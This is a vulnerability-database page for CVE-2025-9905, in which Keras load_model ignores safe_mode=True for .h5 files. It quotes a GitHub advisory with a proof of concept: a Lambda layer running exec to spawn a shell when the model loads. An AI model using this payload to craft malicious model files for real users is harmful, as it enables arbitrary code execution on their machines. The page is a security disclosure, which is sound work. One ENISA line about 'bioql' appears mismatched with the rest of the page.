Loading HuntDB...

CVE-2025-9905

UNKNOWN
Published Unknown
Actions:

Expert Analysis

Professional remediation guidance

Get tailored security recommendations from our analyst team for CVE-2025-9905. We'll provide specific mitigation strategies based on your environment and risk profile.

No CVSS data available

Description

The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True.

One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.

This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives.

Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.

Available Exploits

No exploits available for this CVE.

Related News

No news articles found for this CVE.

EU Vulnerability Database

Monitored by ENISA for EU cybersecurity

EU Coordination

EU Coordinated

Exploitation Status

No Known Exploitation

ENISA Analysis

Malicious code in bioql (PyPI)

Affected Products (ENISA)

keras-team
keras

ENISA Scoring

CVSS Score (4.0)

7.3
/10
CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Data provided by ENISA EU Vulnerability Database. Last updated: October 3, 2025

GitHub Security Advisories

Community-driven vulnerability intelligence from GitHub

✓ GitHub Reviewed HIGH

The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.

GHSA-36rr-ww3j-vrjv

Advisory Details

**Note:** This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your `SECURITY.md`, but received no response. --- ## Summary When a model in the `.h5` (or `.hdf5`) format is loaded using the Keras `Model.load_model` method, the `safe_mode=True` setting is **silently** ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the `.h5`/`.hdf5` file format. The attack works regardless of the other parameters passed to `load_model` and does not require any sophisticated technique—`.h5` and `.hdf5` files are simply not checked for unsafe code execution. From this point on, I will refer only to the `.h5` file format, though everything equally applies to `.hdf5`. ## Details ### Intended behaviour According to the official Keras documentation, `safe_mode` is defined as: ``` safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True. ``` I understand that the behavior described in this report is somehow **intentional**, as `safe_mode` is only applicable to `.keras` models. However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. `.h5` files can still be loaded seamlessly using `load_model` with `safe_mode=True`, and the absence of any warning or error creates a **false sense of security**. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if `safe_mode` cannot be applied to a given file format, an explicit error should be raised to alert the user. This issue is particularly critical given the widespread use of the `.h5` format, despite the introduction of newer formats. As a small anecdotal test, I asked several of my colleagues what they would expect when loading a `.h5` file with `safe_mode=True`. None of them expected the setting to be **silently** ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion. ### Technical Details Examining the implementation of `load_model` in `keras/src/saving/saving_api.py`, we can see that the `safe_mode` parameter is completely ignored when loading `.h5` files. Here's the relevant snippet: ```python def load_model(filepath, custom_objects=None, compile=True, safe_mode=True): is_keras_zip = ... is_keras_dir = ... is_hf = ... # Support for remote zip files if ( file_utils.is_remote_path(filepath) and not file_utils.isdir(filepath) and not is_keras_zip and not is_hf ): ... if is_keras_zip or is_keras_dir or is_hf: ... if str(filepath).endswith((".h5", ".hdf5")): return legacy_h5_format.load_model_from_hdf5( filepath, custom_objects=custom_objects, compile=compile ) ``` As shown, when the file format is `.h5` or `.hdf5`, the method delegates to `legacy_h5_format.load_model_from_hdf5`, which does not use or check the `safe_mode` parameter at all. ### Solution Since the release of the new `.keras` format, I believe the simplest and most effective way to address this misleading behavior—and to improve security in Keras—is to have the `safe_mode` parameter raise an **explicit error** when `safe_mode=True` is used with `.h5`/`.hdf5` files. This error should be clear and informative, explaining that the legacy format does not support `safe_mode` and outlining the associated risks of loading such files. I recognize this fix may have minor backward compatibility considerations. If you confirm that you're open to this approach, I’d be happy to open a PR that includes the missing check. ## PoC From the attacker’s perspective, creating a malicious `.h5` model is as simple as the following: ```python import keras f = lambda x: ( exec("import os; os.system('sh')"), x, ) model = keras.Sequential() model.add(keras.layers.Input(shape=(1,))) model.add(keras.layers.Lambda(f)) model.compile() keras.saving.save_model(model, "./provola.h5") ``` From the victim’s side, triggering code execution is just as simple: ```python import keras model = keras.models.load_model("./provola.h5", safe_mode=True) ``` That’s all. The exploit occurs **during model loading**, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way. As expected, the attacker can substitute the `exec(...)` call with any payload. Whatever command is used will execute with the same permissions as the Keras application. ## Attack scenario The attacker may distribute a malicious `.h5`/`.hdf5` model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model—*even with* `safe_mode=True` that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous. Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.

Affected Packages

PyPI keras
ECOSYSTEM: ≥3.0.0 <3.11.3

CVSS Scoring

CVSS Score

7.5

CVSS Vector

CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Advisory provided by GitHub Security Advisory Database. Published: September 19, 2025, Modified: September 19, 2025

Published: Unknown
Last Modified: Unknown
Copied to clipboard!